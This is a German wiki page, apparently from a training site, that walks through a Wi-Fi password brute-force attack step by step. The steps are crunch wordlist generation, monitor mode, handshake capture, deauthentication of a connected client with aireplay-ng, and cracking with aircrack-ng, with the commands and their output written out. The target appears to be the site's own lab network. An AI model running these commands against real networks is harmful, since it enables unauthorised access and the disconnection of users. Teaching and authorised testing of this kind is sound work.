Wlan Bruteforce Attacke Praxis

Aus xinux.net
Zur Navigation springen Zur Suche springen

Passwordliste generieren

  • crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
... dies dauert eine Weile

Stoppen von störenden Diensten

  • systemctl stop avahi-daemon
  • systemctl stop NetworkManager

Interface suchen

  • airmon-ng
PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8192cu       Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
Wenn störende Prozesse angezeigt werden diese "killen"
  • echo INT=wlan0 >> data
  • source data

Interface Monitor mode

  • airmon-ng start $INT

Checken

  • airmon-ng check $INT

Wlans anzeigen

  • airodump-ng $INT

Wir suchen nach der BSSID und dem Channel von "dd-xinux"

Wlan0-1.png

  • echo BSSIDAP=00:18:F8:DA:F7:94 >> data
  • echo CHANNEL=6 >> data

Wir suchen nach einer STADION die sich mit "dr-xinux" verbindet

Wlan0-2.png

  • echo BSSIDSTADION=44:74:6C:54:68:E8 >> data

Handshake besorgen

  • source data
  • airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap $INT

Wlan0-3.png

(sends deauthentication packets) im zweiten Fenster

  • source data
  • aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION $INT
18:40:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel6
.....
18:57:44  Sending 64 directed DeAuth (code 7). STMAC: [44:74:6C:54:^C:E8] [ 0| 9 ACKs]
bis der client rausfliegt

Nach dem Wiederverbinden kommt der handshake

Wlan0-4.png

Handshake erhalten

HANDSHAKE=00:18:F8:DA:F7:94

Cracken

  • aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap

Wlan0-5.png

Crack Geschwindigkeiten

  • Laptop schafft circa 1000 Keys pro Sekunde
  • Eine starke Grafikkarte (Titan XP) schaft 520000 hash/s
  • Online Rechenpower mieten
  • Cluster aus mehreren Grafikkarten bauen

Video

Abgerufen von „https://xinux.net/index.php?title=Wlan_Bruteforce_Attacke_Praxis&oldid=25389